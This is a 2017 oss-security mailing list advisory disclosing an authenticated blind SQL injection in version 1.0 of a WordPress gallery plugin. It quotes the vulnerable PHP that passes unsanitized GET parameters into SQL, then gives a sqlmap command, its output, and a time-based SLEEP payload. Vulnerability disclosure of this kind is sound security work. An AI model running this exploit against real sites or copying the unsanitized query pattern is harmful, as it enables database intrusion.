[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation v1.0
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2017-08-25 16:03:02
Message-ID: 29FBF111-3395-49B0-8A35-4E6D36963175 () me ! com
[Download RAW message or body]

Title: Authenticated Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation \
                v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2017-07-22
CVE-ID:[CVE-2017-1002028]
Download Site: https://wordpress.org/plugins/wordpress-gallery-transformation/
Vendor: http://angrybyte.com
Vendor Notified: 2017-08-07
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=199
Description: Transforms word press into a gallery, wallpapers website, you name it.
Vulnerability:
SQL injection is in ./wordpress-gallery-transformation/gallery.php via $jpic parameter being \
unsanitized before being passed into an SQL query.

--
231-
232- $pfx=$wpdb->prefix;
233-dbcreator();
234- if($_GET['picnj']){
235-
236: $jpic=$_GET['picnj'];
237: $jnm=$_GET['nmj'];
238- $wpdb->query("update {$pfx}gallery set name='{$jnm}' where id=$jpic;");
239- $wpdb->query("update {$pfx}gallery set rates=44");
240- return 'ok?';

The attacker will need to be logged in and able to manage the gallery in order to exploit.

Exploit Code:
	• $ sqlmap --load-cookies=./cookie -u \
'http://example.com/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=*' \
--level 4 --risk 3 --dbms mysql  •  
	•  
	• URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
	• sqlmap identified the following injection point(s) with a total of 2556 HTTP(s) requests:
	• ---
	• Parameter: #1* (URI)
	•    Type: AND/OR time-based blind
	•    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
	•    Payload: http://example.com:80/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=(CASE \
WHEN (4165=4165) THEN SLEEP(5) ELSE 4165 END)  • ---
	• [13:16:53] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Ubuntu 16.04 (xenial)
	• web application technology: Apache 2.4.18
	• back-end DBMS: MySQL >= 5.0.12
	• [13:16:53] [INFO] fetched data logged to text files under \
'/home/larry/.sqlmap/output/example.com'  •  
	• [*] shutting down at 13:16:53=


[prev in list] [next in list] [prev in thread] [next in thread]